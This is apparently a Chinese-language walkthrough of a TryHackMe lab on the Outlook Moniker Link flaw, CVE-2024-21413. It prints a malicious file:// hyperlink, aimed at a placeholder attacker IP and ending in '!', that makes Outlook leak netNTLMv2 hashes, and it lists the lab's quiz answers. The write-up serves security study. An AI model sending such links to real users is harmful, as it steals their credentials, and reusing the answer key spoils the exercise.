Tryhackme — Moniker Link (CVE-2024–21413)
任务 1 — 介绍
2024年2月13日,微软宣布了一个Microsoft Outlook远程代码执行(RCE)与凭证泄露漏洞,编号为 CVE-2024-21413 (Moniker Link)。Check Point Research的Haifei Li因发现此漏洞而受到表彰。
该漏洞绕过了Outlook在处理特定类型超链接(即Moniker Link)时的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦受害者点击该超链接,就会导致Outlook将用户的NTLM凭证发送给攻击者。
回答以下问题: 该CVE被分配的“严重性”评级是什么?= 严重 (Critical)
任务 2 — Moniker Link (CVE-2024–21413)
通过在超链接中使用 file:// Moniker Link,我们可以指示Outlook尝试访问一个文件,例如网络共享上的文件(<a href="file://攻击者_IP/test">点击我</a>)。这会使用SMB协议,该协议涉及使用本地凭证进行身份验证。然而,Outlook的“受保护的视图”会捕获并阻止此尝试。
此处的漏洞在于,我们修改了超链接,在Moniker Link中包含 ! 特殊字符和一些文本,从而绕过了Outlook的受保护的视图。例如:
<a href="file://攻击者_IP/test!exploit">点击我</a>。
作为攻击者,我们可以提供这种性质的Moniker Link进行攻击。请注意,远程设备上不需要实际存在该共享,因为无论如何都会尝试进行身份验证,从而导致受害者的Windows netNTLMv2哈希值被发送给攻击者。
远程代码执行(RCE)是可能的,因为Moniker Link在Windows上使用了组件对象模型(COM)。然而,解释这一点超出了本练习的范围,因为目前还没有公开发布的针对此特定CVE实现RCE的概念验证。
回答以下问题: 我们在超链接中使用了哪种Moniker Link类型?= file:// 用于绕过Outlook“受保护的视图”的特殊字符是什么?= !
任务 3 — 漏洞利用
数据来源: https://tryhackme.com/room/monikerlink
PoC (概念验证) 包含以下步骤:
- 获取攻击者与受害者的电子邮件地址。通常,你需要使用自己的SMTP服务器(本练习中已提供)。
- 需要密码进行身份验证。在本练习中,
attacker@monikerlink.thm的密码是attacker。 - 包含邮件内容 (html_content),其中包含作为HTML超链接的Moniker Link。
- 填写邮件中的“主题”、“发件人”和“收件人”字段。
- 最后,将邮件发送到邮件服务器。
回答以下问题: 我们在AttackBox上用来捕获用户哈希的应用程序叫什么名字?= responder 一旦电子邮件中的超链接被点击,捕获到的哈希是什么类型?= netNTLMv2
其余任务与新Outlook更新有关,如果不查看答案,很可能无法完成该房间的学习,这就是为什么答案会在任务本身中指明。
这是我的学习总结,希望对你有所帮助,别忘了关注。FINISHED CSD0tFqvECLokhw9aBeRqm5orB3AsHVzWqw5nASLxH9NbQfXT2bQPYZThKYCe4Jv48TgTN9cT+sa7UDoads3y/guN6+Q4S1LWPV/MKeUL/p6w4ps0bEExAdq59YOidx2
